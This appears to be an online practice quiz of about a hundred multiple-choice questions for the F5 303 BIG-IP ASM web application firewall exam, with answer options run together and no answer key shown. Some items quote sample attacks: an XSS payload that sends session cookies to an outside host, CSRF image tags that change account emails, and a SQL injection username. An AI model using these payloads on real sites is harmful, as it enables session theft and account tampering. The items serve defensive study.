option
Cuestiones
ayuda
daypo
CREAR TEST
buscar.php

TEST BORRADO, QUIZÁS LE INTERESE: F5 303

COMENTARIOS ESTADÍSTICAS RÉCORDS
REALIZAR TEST
Título del Test:
F5 303

Descripción:
test 303

Autor:
Gaoul
OTROS TESTS DEL AUTOR

Fecha de Creación: 22/10/2024

Categoría: Informática

Número Preguntas: 102
COMPARTE EL TEST
ComentarNuevo Comentario
No hay ningún comentario sobre este test.
Temario:
An ASM Specialist needs to log violations for unauthenticated users who try to access restricted resources. What must be configured? enable Alarm flag for login URL bypassed in Learning and Blocking Settings configure Brute Force Attack Prevention create a Disallowed URL in URLs list enable Alarm flag for Illegal URL Learning and Blocking Settings.
An organization utilizes the BIG-IP ASM module. The organization is concerned about DoS attacks and wants to use a policy feature that can help with automatic mitigation based on back-end server performance. Which ASM DOS profile feature should the ASM Specialist implement? Stress-based DoS Detection TPS-based DoS Detection Heavy URL Protection Bot Signature Lists.
An ASM Specialist exports an ASM policy in the XML format with the "compact format" option. What is the result? ASM generates a file in a binary format ASM discards any WSDL previously uploaded to the XML content profiles ASM uses the gzip format to reduce the size of the exported policy ASM does not include the staging state for signatures.
An ASM Specialist is deploying ASM for a custom application. The specialist needs to use known good traffic from QA employees to build the security policy in the least time possible. How should the ASM Specialist create the policy? with an F5 application template and add QA addresses to the IP Addresses Whitelist automatically and add QA addresses to the IP Address Exceptions list automatically and add QA addresses to the Trusted IP Addresses list manually and add QA addresses to the IP Addresses Exceptions list.
An ASM Specialist needs to configure a login page based on the following form: what are the correct settings for the login page? Login URL:Explicit HTTP /welcome.php Expected HTTP response status code:200 Login URL:Explicit HTTPS /login.php Expected HTTP response status code:302 Login URL:Explicit HTTPS /welcome.php Expected HTTP response status code:200 Login URL:Explicit HTTP /login.php Expected HTTP response status code:302.
While reviewing the ASM Policy status, an ASM Specialist discovers URLS that contain %APPDATA%. Which type of common attack does this represent? Command Execution Predictable Resource Location Content Spoofing Format String Attack.
Review the following request An ASM Specialist is modifying a security policy and must allow the web request shown through the ASM to a critical application. How should the ASM Specialist meet this request and support security objectives? permit the Trident 5.0 User Agent modify allowed meta characters validate headers for HTTP 1.1 disable XSS signatures.
Users experience trouble logging into their accounts. The email addresses of some user accounts have changed to all be the same. Which ASM module feature should be configured to protect against such attacks? Redirection Protection Session Tracking CSRF Protection Bot Detection.
An ASM Specialist is deploying a web application that is using SharePoint. The web application is experiencing a system outage caused by a common web vulnerability. Which deployment method should the ASM Specialist use to quickly mitigate the security attack? manual policy rapid deployment security policy policy based on a third-party vulnerability assessment automatic policy.
An organization is deploying an AJAX application using XML for data transfer. The ASM Specialist needs to keep the number of false positives to a minimum. It is a requirement that the security policy begin blocking automatically once ASM learns application traffic. Which deployment policy should the ASM Specialist use to accommodate these requirements? Third-Party vulnerability testing tool Real Traffic Policy Builder and keep signatures in staging Application Template in Rapid Deployment Manager Rapid Deployment Mananger.
An ASM Specialist enables Data Guard to prevent credit card numbers from being exposed in several legacy applications. Users report that it takes too long to download files through these applications. Which Data Guard configuration changes should the ASM Specialist make to resolve the issue? create custom patterns to match credit card numbers only configure an ignored URLs list for approved documents disable mask data enable exception patterns for Word and PDF documents.
An ASM Specialist finds that bots are continuously making username and password attempts on the login page of an organization´s web application. What is a potential effect on the web application? randomly locked accounts reduced application latency reduced memory utilization of the application application server reboot.
An ASM Specialist sets up a new ASM Security Policy in Blocking mode with all Attack Signatures set to Learn and Alarm. A request matching an Attack Signature is received. What happens to the request? Illegal requests are NOT logged, learning is unavailable and they are NOT blocked Illegal requests are logged, learning is available and they are NOT blocked. Illegal requests are logged, learning is unavailable and they are blocked Illegal requests are NOT logged, learning is available and they are blocked.
An e-commerce website sets a cookie on the client machine specifying that the user is eligible for a 25% discount on the user´s next visit. The user maliciously changes the content of this cookie to specify that they are elegible for a 100% discount on their next visit. How should an ASM Specialist adjust the configuration to protect the website while the ASM module is in Blocking mode make sure that the "Block" checkbox for "ASM cookie hijacking" is checked add cookie to "Enforced Cookies" list check the "Block" checkbox for "Cookie not RFC- Compliant" add cookie to "Allow Cookies" list.
An ASM Specialist is deploying a new application security policy using the automatic policy building option and needs to learn explicit parameters at the URL level. Which policy type within the automatic policy builder should the ASM Specialist use ? Enchanced Advanced Fundamental Comprehensive.
An organization has a legacy webshop running. The ASM Specialist needs to provide a baseline ASM Security Policy to this webshop. The operating system is Linux. The web server is Apache. Tomcat operates the web shop. What is the most efficient deployment method to establish an Attack Signature-based policy? manually for XML and web services using Automatic Policy Builder manually with the Rapid Deployment security policy using a third party vulnerability assessment tool output.
Which setting should an ASM Specialist configure on an ASM module before a WhiteHat Sentinel scanner vulnerability can be imported? WhiteHat Sentinel Vulnerability UI WhiteHat Web API key WhiteHat Scanner Integration WhiteHat Scanner Assessment Tool.
A user needs to do the following: - Modify security policies - Review HTTP, FTP and SMTP profiles on the LTM+ASM device - No access or ability to modify any other LTM or TMOS objects Which user role should be assigned to meet these requirements? Application Security Editor Application Security Administrator Firewall Manager Administrator.
An ASM Specialist recently modified the ASM configuration to respond to an ongoing DoS attack on the protected wewbsite. The ASM policy of the website is in Blocking mode. The Stress-based DoS Detection setting are as follows. -Blocking -Detection by Source IP -Mitigation of Client Side Integrity Defense -Standard Protection in Behavioral settings Which method should the ASM Specialist use to determine if the attack has been successfully mitigated? review the Historical and Recent Attacks log and look for the flag of an attack in progress check the Dashboard to make sure that the CPU and memory usage on the Web Server have returned to normal pre-attack levels look for Client Side Integrity Defense log entries on the website servers to verify that protection is in place. make sure that Bot Signature Checking si working by verifying that Googlebot or order friendly bots can reach the website.
Which option should an ASM Specialist configure in the policy to mitigate the potential attacks in the request? create the cookie "security" as an Enforced Cookie enable HTTP Protocol Compliance Failed violation add the header Upgrade-Insecure-Requests to the policy apply the Generic Detection Signatures set.
After a penetration test, an application developer wants the ASM Specialist to set the http Only attribute on the PHP_SESSION cookie. The developer needs to know the impact of this change. What informaation should the ASM Specialist provide to the developer? A new virtual server running on port 80 will be required to maintain functionality The PHP_SESSION cookie must be added to Enforced Cookies to maintain functionality The PHP_SESSION cookie will NOT be sent via non-encrypted paths The PHP_SESSION cookie will NOT be accessible to browser scripts.
An organization configured ASM with TPS-based Detection in Blocking mode. The organization discovered that TPS-based Detection is blocking its upstream content-caching servers. An ASM Specialist needs to allow the content-caching servers to access the web application without weakening TPS-based Detection protection. Which TPS-based Detection profile change should the ASM Specialist make? configure the IP addresses of the content-caching servers in the IP Address Whitelist set the Prevention Duration for TPS-based Detection to a maximum of 300 seconds increase "TPS reached" in the IP Detection Criteria to the rate of the content-caching servers enable URL-Based Client-Side Integrity Defense for the landing URL of the protected website.
Based on existing attack patterns, an ASM administrator recently implemented significant changes to the deployed policy. To evaluate effect of the deployed policy adjustments, a reliable method is needed to examine the possible effect. An easy method to aggregate and interpret the data is required to simplify the evaluation process. What should be reviewed to determine the cause? the ASM Request Log the Event Correlation data the entries present in / var / log / asm DoS Application Events.
An ASM Specialist implements a new Attack Signature to prevent an XSS attack. How should the ASM Specialist establish that the vulnerability is mitigated? 1. Configure Security >> Application Security >> IP Addresses >> IP Address Intelligence >> New IP Address with an exception for a vulnerability scanner and verify the attack is successful 2. Remove the application security from the IP Address Intelligence list, reapeat the attack and verify the attack has been mitigated 3. Access the application security brute force attacks log and verify the attack has logged correctly. 1. Configure Security >> Application Security >> IP Addresses >> IP Address Exception >> New IP Address Exception with an exception for a vulnerability scanner and verify the attack is successful 2. Remove the scanner address from the IP address Exceptions list, repeat the attack and verify the attack has been mitigated 3. Access the application security brute force attacks log and verify the attack has logged correctly. 1. Configure Security >> Application Security >> IP Addresses >> IP Address Exception >> New IP Address Exception with an exception for a vulnerability scanner and verify the attack is successful 2. Remove the scanner address from the IP address Exceptions list, repeat the attack and verify the attack has been mitigated 3. Access the application security requests log and verify the attack has logged correctly. 1. Configure Security >> Application Security >> IP Addresses >> IP Address Intelligence >> New IP Address Exception with an exception for a vulnerability scanner and verify the attack is successful 2. Remove the scanner address from the IP address Intelligence list, repeat the attack and verify the attack has been mitigated 3. Access the application security requests log and verify the attack has logged correctly.
An organization has an active/standby cluster of two BIG-IP devices that run LTM and ASM modules and are in a Device Group BIG-IP-1 is Active BIG-IP is Standby. The Internet-facing application of the organization is protected by an ASM policy that is in Blocking Enforcement mode. BIG-IP becomes active after a system upgrade. The ASM Specialist receives a report that several attack types are no longer being blocked. Which next step should the ASM Specialist take to make sure the ASM policy functions correctly? update ASM attack signatures configure Application Security Synchronization update IP Intelligence database configure Web Scraping protection.
An ASM Specialist has been assigned to work with a new Security Engineer. The ASM Specialist needs to create an account for the new engineer that allows the creation, modification and assignment to virtual servers of new and existing ASM policies Which role should the ASM Specialist assign to the engineer to meet the minimun requirements? Administrator Application Editor Application Security Administrator Application Security Editor.
A request is blocked due to an HTTP Request Smuggling Attack type. Which violation triggered this event? POST request with Content-Length: 0 Body in GET or HEAD requests Header name with no header value Bad multipart/form-data request parsing.
Which vulnerability can an ASM module automatically resolve by importing a generic vulnerability scanning results XML file ? Path Traversal Session Hijacking Cookie Manipulation Unavalidated Redirects and Forwards.
An ASM Specialist needs to force a browser to authenticate before accessing a list of resources. The default session lifetime must be overriden with a shorter value. Which two settings should the ASM Specialist enable and configure? (Choose two) Cookie List URL: Wildcard order Login Enforcement Mandatory Header Login Pages List.
An ASM Specialist is creating a new policy on the Deployment Wizard. When should an ASM Specialist check the Security Policy is case sensitive option? when the application server and the language are case sensitive when the store security elements are lower case when the attack signatures must be case sensitive when the application language is Unicode (utf-8).
Which action should an ASM Specialist take to see all of the requests when the security policy is in transparent mode? Configure the HTTP Protocol Compliance Set the enforcement to Alarm Configure the Logging Profile Set enforcement mode to Blocking.
Users can access the information page, phpinfo.php, for a PHP web application protected by an ASM policy in Blocking mode. Access must be restricted to this page inmediately without disrupting traffic. What should the ASM Specialist do to fix this problem? add phpinfo.php to the Disallowed file types add /phpinfo.php to the Disallowed URLS add php to the Disallowed file types add* .php to the Disallowed URLS.
A Requests log shows that the "xmlPayload" parameter value is a base64string of encoded XML content. An ASM Specialist decodes the base64 string and identifies illegal meta characters that should be allowed. How should the ASM Specialist create the xmlPayload parameter? override the wildcard entity with base64 meta-characters create an explicit XML Parameter Value type using regular expressions and override the meta characters create an explicit User.Input Parameter Value type with base64 option triggered and override the meta characters change the default Character Sets Policy to allow base64 content.
A review of web application logs shows failed logins with unexpected usernames such as "OR 'A' =CHR(65)". Which ASM feature should an ASM Specialist use to protect against this type of malicious behavior? Attack Signatures Plain Text Profiles Web Scrapping Login Enforcement.
An organization needs to gather statistics on the amount of traffic received from specific countries. The ASM policy enforcement mode is set to Transparent. The ASM Specialist adds the specified countries into the Disallowed Geolocations to gather the information Access from Disallowed Geolocations uses default settings. What happens to requests from countries added to the Disallowed Geolocations when enforcement mode is changed to Blocking? Requests are logged as illegal and allowed Requests are logged as illegal and blocked Requests are blocked Requests are allowed.
Which learning suggestion should be generated by the request shown? Attack Signature Detected - JavaScript buffer overflow attempt Attack Signature Detected - XPath injection Script Attack Signature Detected - Cross-Site Request Forgery (CSRF) attack signature Detected- Cross-Site Scripting (XSS).
An ASM Specialist updates the ASM Signatures Database. After 5 days, the ASM Specialist gets an escalation from the Security Operation Center. A specific SQL Injection pettern is bypassing the ASM Policy. The ASM Policy is successfully mitigating other malicious traffic including other SQL Injections. Only the reported SQL Injection pattern is bypassing the ASM Policy. The ASM Policy event log shows that the reported attack pattern is getting detected but is NOT getting blocked. What is causing this problem? The attack pattern matches an outdated SQL Injection Signature The attack pattern matches the SQL Injection Signature, which has the lowest "Violation rating" The attack pattern matches the SQL Injection Signature, which does NOT have any parameter in the request The attack pattern matches the newly updated SQL Injection Signature, which is under staging.
An organization´s website tracks a user by including the user account number as an unprotected HTML form parameter. How should an ASM Specialist protect against this threat? add the parameter as a dynamic parameter with proper extraction enable Data Guard with a custom pattern to protect the parameter configure Proactive Bot Detection to prevent parameter tampering enforce flows to the URL that serves the HTML form and the parameter.
An ASM Specialist needs to make sure that only .png, jpg and ,gif file types can be downloaded from a corporate portal. The corporate portal uses a Content Management System that generates a special download form. The following is an excerpt from the form delivered by the application prior to the file download request. Which set of configuration steps should an ASM Specialist complete to meet this requirement? 1. Add the ".png", ".jpg" and ".gif" file types to the allowed file types 2. Create explicit parameter "fsel" 1. Create explicit parameter "fsel" 2. Configure an appropriate Regular Expression for "fsel" parameter 1. Add the ".png", ".jpg" and ".gif" file types to the allowed file types 2. Remove the wildcard file type from the allowed file types 1. Add the ".png", ".jpg" and ".gif" file types to the allowed file types 2. Configure an appropriate Regular Expression for the allowed file types.
An organization is deploying a QA environment for testing a new Web2.0 application and needs it protected by a security policy. Network Engineering wants the ability to easily and quickly define trusted IP addresses. The Application Developers require JSON/XML payload detection. The Security Engineers have requested these requirements be defined during the creation of the policy. Which deployment method will satisfy these requirements? Third Party Vulnerability Rapid Deployment Policy Builder Manual.
Which option should an ASM Specialist configure in the ASM Security Policy to mitigate this type of attack? apply Generic Detection Signatures set configure aspx as Disallowed File Types configure price as Sensitive Parameter enable Web Scraping.
Refer to the exhibit Which attack is shown in the exhibit? SQL Injection Cross-Site Scripting Cross-Site Request Forgery XML Entity Attack.
An ASM Specialist is creating an iRule that fires on the ASM_REQUEST_VIOLATION event in order to capture specific application related information (such as user id and Java SessionId). However, the ASM Specialist did NOT find any entries while inspecting the logs. Which action should the ASM Specialist take in order for the logs to be updated? Enable sensitive parameters. Take the ASM Policy out of Transparent Mode Apply the iRule to the ASM Policy Enable Trigger ASM iRule Events.
Which option should an ASM Specialist enable in the policy to mitigate the potential attacks present on the request? Evasion Technique Detected violation Illegal empty parameter value violation Illegal repeated parameter name violation Generic Detection Signatures.
Refer to the exhibit An organization´s security policy indicates that: 1. "." (dot) is allowed in "password" parameter 2. "." (dash) is disallowed in "login" parameter The wildcard parameter has NO meta character overridden and is the only entity declared Which setting should the ASM Specialist modify? the global policy parameters Character Set for Parameter Value, allow .(dot) the wildcard parameter Value Meta Characters, disallow - (dash) the newly created Parameter "password" Value Meta Characters, allow .(dot) the newly created Parameter "login" Value Meta Character, disallow- (dash).
Which option should an ASM specialist enable in the Learning and Blocking settings to mitigate the potential attacks present on the request? Null in Request Redirection Protection Failed to Convert Character Cross-Site Request Forgery Protection.
An ASM Specialist is reviewing a security audit report and discovers that a SQL Injection pattern reached the application server while the security policy is in blocking mode. Which two settings should the ASM Specialist check to determine the cause of this issue? (Choose two) Illegal parameter Anomaly detection Check parameter value Brute Force attack prevention Meta-character in value.
An ASM Specialist needs to use Policy Diff to compare security policies. Which three user roles allow the ASM Specialist to perform this task? Manager, Application Security Administrator, Resource-Administrator Operator, Application Security Editor, Administrator Administrator, Application Security Administrator, Application Security Editor Resource Administrator , Application Security Administrator, Application Editor.
A customer is preparing an online retail site to sell a new product. The customer exepcts an unusually high number of client requests. The retail web application is protected by an ASM policy in Blocking mode. The top priority is to keep the ASM module from becoming the limiting factor for application performance. Which change should the ASM Specialist make to the ASM configuration to meet the customer requirements ? configure ASM bypass configure ASM policy in Transparent mode put attack signature out of staging enable DDoS protection.
A web auction site allows users to post images that other users can view. The site has a Cross-Site Request Forgery vulnerability. How does this vulnerability potentially affect application security? A user who views the post can bid on an item without the user´s knowledge An attacker can compromise a site´s credit card database An attacker can finalize a successful bid for delivery without paying for the item An attacker can capture the user´s username and password.
An ASM Specialist finds the following violation in the Manual Traffic Learning section of ASM under Attack Signature Detected: XSS script tag end (Parameter) Which two options should the ASM Specialist find as suggestions in the Action column for this violation? (Choose two) Disable on URL Accept All Disable on parameter Accept Disable.
The messages started to appear 8 hours ago. query_items.aspx consume considerable server resources and involve compex database queries. This URL experiences high latency when accessed by the user. Which option should an ASM Specialist configure in the ASM policy to mitigate this type of attack? Enable Web Scraping Apply Generic Detection Signatures Enable Brute Force Attack Prevention Enable DoS Protection profile.
Review the following request: Which option should an ASM Specialist enable in the Learning and Blocking Settings to mitigate the potential attacks in the request? bad unescape multiple decoding unparsable request content null in request.
An ASM Specialist has a requirement to restrict queries to a nine-digit product code. An Explicit Parameter named q is configured with the following specifications. -Decimal Data Type settings of Minimum Value of Any -Maximum Value of Any -Maximum Length of 9 The ASM policy Blocking Settings are configured with illegal parameter value length Learn, Alarm and Block. Which HTTP request should the ASM Specialist use to test a failed request? GET /search=12345678910HTTP/1.0 GET /search.php?q=123456789HTTP/1.0 POST /q=123456 HTTP/1.0 GET /search.php?q=12345678910HTTP/1.0.
A legitimate user visits a site while authenticated to the corporate application. The site has changed personal data on the coporate application using the following HTML tag: <img src="https://coporateapp/myprofile?email=tedyi****@mail.com"> What should an ASM Specialist configure to mitigate such attack? CSRF Protection Login Enforcement Redirection Protection Proactive Bot Defense.
An organization recently launched a web store selling music downloads, which is protected by an ASM Security Policy. Some partner resellers indicate that their web crawlers are being blocked. How should this issue be resolved? disable the Attack Signatures for Signature Scope JSON set Attack Signatures for Unix/Linux to Staging set Attack Signatures for System Independent to Staging disable the Attack Signatures for Attack Type Non-Browser client.
An ASM Specialist tries to determine the username used in an attack. The ASM Specialist notices the following log on the ASM: Which specific configuration changes should the ASM Specialist make to ensure that the username is logged? remove username from the sensitive parameters list create a logging policy to log all requests configure and enable login enforcement change the username parameter settings so that username is logged.
An ASM Specialist adds a wildcard parameter to a security policy and re-selects the check attack signatures on the parameter box. Which unintended positive security vulnerability might the action introduce? remote file include web scraping path traversal forceful browsing.
Which ASM function generates this violation? HTTP protocol compliance failed Mandatory HTTP header is missing Attack signature detected Illegal meta character in URL.
An ASM Specialist makes changes to a security policy to mitigate potential vulnerability in the code. Those changes are shown in the audit log in the exhibit. Which Negative Security-Based vulnearability is the username parameter now vunerable to ? SQL Injection Abuse of Functionality Forceful Browsing HTTP parser attack.
An organization is experiencing an increase in Layer 7 attacks against its file-sharing web application, including the use of malware. The organization has an ICAP antivirus server that can examine files for malware. The ASM Specialist needs to block malicious files, and the application´s performance should NOT be severely slowed by anti-malware protection. Which two ASM policy choices should the ASM Specialist make to meet these requirements? (Choose two) select the "Inspect file uploads within HTTP requests" check box in Anti-Virus Protection select the Learn and Alarm check boxes for the Virus Detected violation on the Blocking Settings page configure an ICAP server in Anti-Virus Protection, and check Guarantee Enforcement configure an ICAP server in Anti-Virus Protection, and do NOT check Guarantee Enforcement choose Comprehensive mode when building the ASM policy to include Anti-Virus Protection.
Which two changes happen to ASM signatures after updating the system-supplied attack signatures? (Choose two) The latest attack signatures are added and the update provides any revisions to existing attack signatures. The latest attack signatures are added and all attack signatures from previous updates are deleted The latest attack signatures are added and all attack signatures from the previous updates are included The update only provides new timestamps to existing signatures The update only provides revisions to existing attack signatures and no new signatures are added.
An organization needs to use "curl" to perform manual testing against a web application protected by an ASM Security Policy. The ASM Policy is in Blocking mode. The ASM Specialist needs to allow the testing to work without compromising the security of the web application. Which step should the ASM Specialist take? change the Security Policy Enforcement Mode to Transparent add the tester´s client IP address to the IP Address Exceptions List enable Signature Staging for the Security Policy disable Block for the Automated client access "curl" Attack Signature.
An organization creates one of its existing security policies from imported Cenzic vulnerability scan results. The ASM Specialist then re-scans the application using Qualys and needs to import the scan results. How should this be accomplished? configure the IP address and port for the Qualys API destination import the file exported from the Qualys scanner into the existing policy create a new security policy and import the Qualys scanner results supply the username and password for the Qualys account used to scan.
An ASM policy is in Transparent mode. The allowed file types list is empty. Otherwise, the policy is completely configured. All protections are set to learn and alarm. What happens if the policy enforcement mode is changed to Blocking? Only known attacks are logged as illegal All requests are blocked and logged as illegal All requests are logged as illegal Only known attacks are blocked and logged as illegal.
An ASM Specialist needs to only allow access to three explicit file types. The ASM Specialist modifies the policy to specify those file types and takes them out of staging. In testing, the ASM Specialist is able to successfully access other file types. Which additional step does the ASM Specialist need to complete? Enable illegal URL violation blocking Take the wildcard file type entity out of staging Remove the wildcard file type entity Change the Enforcement Readiness Period to zero days.
The ASM Policy Export function minimizes the output by excluding which two configuration settings? (Choose two) File Content Checking File Types Meta-Character set Data Guard Custom Patterns Blocking Pages Parameters Wildcard Order.
An organization has a web application protected by the ASM system with "UTF-8" application language. The application team needs additional language support for the web application for French, Arabic and Spanish. These languages will serve the same web content. The application team has given different Application Laguange as "Western European (iso-8859-15)" to support Arabic. Other languages must keep using "UTF-8" as Application Language Each language must be acccesible over a different URI. An ASM Specialist needs to incorporate new languages support while keeping the existing web application secure. How should the ASM Specialist meet this requirement? 1. Create a new ASM Policy with "Western European (iso-8859-15)" Application Language 2. Apply an LTM Policy with rules for each URI and appropriate ASM Policy to the virtual server 1. Export the existing web application ASM Policy 2. Modify the Application Language to "Western European (iso-8859-15)" 3. Import the updated ASM Policy and apply it to the web application virtual server 1. Export the existing web application ASM Policy 2. Modify the Application Language to "Western European (iso-8859-15)" 3. Import the updated ASM Policy and apply it to the web application virtual server 1. Modify the existing ASM Policy.
An ASM Specialist manually creates a policy in "Blocking mode" for the hostname "www.worldbank.com". A second DNS registration was made using the same IP address with a new FQDN of www.mobilebank.com. Users are blocked by the ASM Security Policy when they try to connect to www.mobilebank.com. What configuration within "Security > Application > Security > Headers > Host Names" will allow all users to access the new FQDN? remove the current hostname select the current hostname and enable "Include Sub.domains" add all required hostnames select the current hostname and disable "Include Sub-domains".
Refer to the exhibit. The ASM Specialist activates Data Guard funtionality. A penetration test finds leaks of some sensitive data. Why is the request shown NOT blocked by Data Guard? Data Guard is NOT set to blocking The provided number is an invalid credit card number The ASM Policy is in transparent mode The appropriate attack signature is in stagging mode.
An organization has a BIG-IP ASM system configured with many XML schemas assigned to multiple policies. While examining recent log entries, the ASM Specialist notices the following error message present in / var/ log / asm What should the ASM Specialist do first? adjust the ASM configuration file issuing the command / usr / shared / ts / bin / add_del_internal add additional_xml_memory_in_mb 0 adjust the ASM configuration file issuing the command / usr / shared / ts / bin / add_del_internal add total_xml_memory 0 adjust the additional _xml_memory_in_mb variable in the System Variables section of the BIG-IP ASM Configuration utility adjust the total _xml_memory variable in the System Variables section of the BIG-IP ASM Configuration Utility.
A web application is developed with a Reflected XSS vulnerability in the dynamic error page of the website. How is the security of the web application affected? The user´s brower password database can be accessed by an attacker using JavaScript from the client side A URL that contains javaScript can be sent to the user, which allows the session token to be captured from the server side. An attacker can capture a client username and password using keyboard logging from the server side A URL that contains JavaScript can be sent to the user, which allows the session token to be captured from the client side.
An ASM Specialist configures Data Guard for credit card numbers with Mask Data enabled. The policy is set to transparent mode. Data Guard is set to blocking. What happens to a response that contains a credit card number? The response is blocked and logged The response is logged as illegal and passed to the client unchanged The response is passed to the client unchanged The number is masked, logged and passed to the client.
An existing AJAX application that already has an ASM policy defined in Fundamental mode is planning a code upgrade. The new version of code will use JSON for data transfer and will contain passwords transfer in a JSON parameter. An ASM Specialist needs to modify the existing ASM policy to support its new version of code. Which change should the ASM Specialist make to the policy for the existing ASM deployment? Define and associate a Header-Based Content Profile for the parameter that contains sensitive data. Build a new policy in Enhanced mode and select the "JSON/XML payload detection" check box Override JSON Profile settings in the AJAX application´s policy with the Overridden Security Policy Settings list Create a Content Profile for JSON traffic and define elements to be masked in Sensitive Data Configuration.
A dictionary attack has been detected against several applications protected by the ASM policy, with an average rate of 50 failed login attempts a second. The ASM Specialist configures a login page within the policy and sets the "Maximum login attempts are exceeded" violation to block. The ASM policy is in Blocking mode. Which method should the ASM Specialist use to determine if the attack has been succesfully mitigated? Attempt to login in to the applications with a JavaScript-disabled browser to mimic the performance of a bot. View the Event Logs for Client Side Integrity Defense responses to attempted logins on the protected pages. View the Dashboard to identify spikes in the network traffic caused by the failed login attempts. View the Brute Force Attack section of the event logs to look for login attempts over the maximum.
An ASM Security Policy contains a parameter that should have some meta characters allowed on one URL, but NOT on the rest of the policy. How should the ASM Specialist configure the adjustments? go to the URL, create the parameter and allow the meta characters go to the parameter itself and allow the required meta characters go to parameter value character sets and allow the required meta characters go to the Learning and Blocking settings and allow the meta characters in the parameter section.
An ASM Specialist tries to import White Hat Sentinel Vulnerability scanner results to modify an existing security policy. The attempt fails. How should the ASM Specialist fix this issue ? retrieve an API key to use for access to the White Hat service to import scan results and configure it within ASM create a new security policy and select "Create a security policy using third party vulnerability assessment tool output" import the XML file generated by the White Hat tool to populate vulnerabilities within ASM reconfigure the security policy to update vulnerabilities based on generic XML formats.
An ASM Specialist needs to drop traffic from the Botnets category. Which two items must the ASM Specialist configure to meet this requirement? (Choose two) Anomaly Detection Session Tracking Attack Signatures Blocking Enforcement Mode Address Intelligence.
An organization deploys a new ASM Security Policy in Blocking mode with Learning mode set to Manual. All Attack signatures of the ASM Security Policy are only set to Learn. How does the ASM Security Policy handle a request that matches an Attack Signature? Illegal requests are logged, blocked and have learning available Illegal requests have learning available Illegal requests are logged and have learning available Illegal requests are logged.
An ASM Specialist needs to log all requests that go through the ASM module. Illegal requests must be stored on this system whenever possible. The ASM Specialist needs to meet these requirements with minimal possible effect on the system. Which logging configuration is required to perform this task ? create one logging profile log all requests locally on the ASM system create one logging profile to log all illegal requests locally on the ASM system with the Guarantee Local Logging option disabled and another profile to log all requests remotely create one logging profile to log all requests to the remote storage create one logging profile to log all illegal requests locally on the ASM system with the Guarantee Local Logging option enabled and another profile to log all requests remotely.
Which two configuration procedures could an ASM Specialist perform to configure the ASM module to download the attack signature update files over the Internet ? (Choose two). Update the Attack Signature Download License Update files through a USB drive Update files using a manual update mode Update files using Data Guard.
An attacker is trying to upload a Windows excutable file to the website behind ASM. The attacker changes the file name of the executable file from adb.exe to adb.jpg. Which two actions should the ASM Specialist take to block the attack ? (Choose two) check "Disallow File Upload of Executables" on the file upload parameter create "img" and "exe" type in Disallowed File Types List create "/ data / adb.exe" URL entry in the Disallowed URL List check "Illegal file type" in Block settings check "Disallowed file upload content detected" in Block settings.
An ASM Specialist is deploying a new application security policy using the automatic policy building option and needs to learn explicit parameters at the URL level. Which policy type within the automatic policy builder should the ASM Specialist use? Comprehensive Enhanced Fundamental Advanced.
Refer to the exhibit. An organization has recently changed web server password requirements. The password requirements are a maximum of 20 characters. The following special characters are allowed for passwords. ?@*-/)(%&#! After the organization changes the password requirements users are unable to change their passwords. Which configuration changes should be made to meet the organization requirements? use Reg.Ex to define the allowed characters override the Value Meta Characters for the allowed special characters modify the maximum length to 20 disable the "Check characters on this parameter" value.
An ASM Specialist needs to log violations for unauthenticated users who try to access restricted resources. What must be configured? Basic attack signatures Bot Detection create a Disallowed URL in URLs list User Defined attack signatures enable Alarm flag for Illegal URL in Learning and Blocking Settings.
An ASM Specialist has enabled CSRF Protection in blocking mode in the ASM policy, but CSRF attacks are NOT being blocked. Which two ASM policy settings could result in this issue? (Choose two) The Alarm box is unchecked for "CSRF Attack Detected" SSL Only is enabled, but the URL to be protected does NOT use SSL The URL to be protected has NOT been added to the URLs List The expiration time for CSRF protection has NOT been specified CSRF token expirations are NOT being Learned.
The web page, http://example.com/sendmail.php, allows users to forward email with the following from: <form action=" / account/edit" method="post"> <p>Email: <input type="text" name="email" /></p> <p><input type="submit" /></p> </form> An attacker´s web page includes the following code: <img height="0" width="0" src="http://example.com/account/edit?email=attacker@email.tld" /> The original website is vulnerable to which type of attack? Cross-Site Request Forgery SSL Injection Mail Command Injection Forceful Browsing.
An ASM Specialist must implement session tracking for http://example.com/sales.aspx. After configuring this option, no sessions are logged. Malicious traffic is blocked for this application. How can this problem be solved? ASM cannot decrypt the SSL traffic A user profile needs to be configured A login page needs to be configured Configure the login enforcement feature.
An ASM Specialist modifies a policy to enable Blocking mode. This configuration change blocks a business partner due to an excessive number of legitimate sessions to a specific web host. The ASM Specialist must make sure that requests that originate from this third party to this web host are not blocked due to session counts. The changes made by the ASM Specialist should maintain all other security protections. Which property should the ASM Specialist modify in the IP exception list to meet this requirement? never block this IP address ignore in Anomaly Detection and to not collect device ID ignore IP address intelligence policy builder trusted IP.
An organization needs to ensure that a competitor does NOT steal pricing information from their website. The organization needs to block these requests while still allowing search engines to index the site. Which protecstion mechanism should be enabled? Session Awareness Web Scraping Login Enforcement Brute Force Attack Prevention.
What does the violation "Disallowed file upload content detected indicate" Anti-virus protection flagged the updated content as malicious Uploaded content is a binary executable The number of permitted uploads are exceeded for this session The uploaded content matches an attack signature.
An attacker tries to access an organization´s corporate homepage by sending the following HTTP request http://1.1.1.1/search.asp7q=<script>x=newImage; x.src=http://deposit.mysite.com/hijackedsession.php?season-cookie=+document.cookie;</script> According to the OWASP Top 10, what type of attack is this? Sensitive Data Exposure Cross-Site Scripting Broken Authentication or Session Management unavalidated Redirects and Fordwards.
Refer to the exhibit. An ASM policy protects a page that provides Ajax data and static content. The URL configuration for the ASM Security Policy shown is NOT working correctly. How should an ASM Specialist fix this problem? add the Content Type application/json to the Header-Based Content Profiles for the URL add the content-type http-json to the Header Based Content Profiles for the URL enable Clickjacking Protection on the URL set the default Request Body Handling to be JSON.
Which option should be enabled in a security policy to mitigate the potential attacks present on the request? Multiple Decoding to consider an evasion after two passes Bad multipart/form-data request parsing violation Clickjacking protection for the URL /content.php Sensitive parameter option for the parameter "document".
An ASM module is configured to block U.S Social Security Numbers, but the numbers are NOT being blocked. What should the ASM Specialist check to determine the cause of this issue? Evasion Techniques Content Profiles Enforcement Mode Sensitive Parameters.
A web application is protected by an ASM Security Policy. An additional request is to block all requests from China. The ASM Specialist reviews the Event Logs. Some requests that are NOT blocked come from public addresses classified as N/A. The ASm Specialist concludes that those addresses are from Chinese address space. What should the ASM Specialist do to make sure those attacks are mitigated in the future? write custom signatures and review Event Logs again update the IP Intelligence database and review Event Logs again update the Geolocation database and review Event Logs again blacklist every address that is classified as N/A and review Event Logs again.
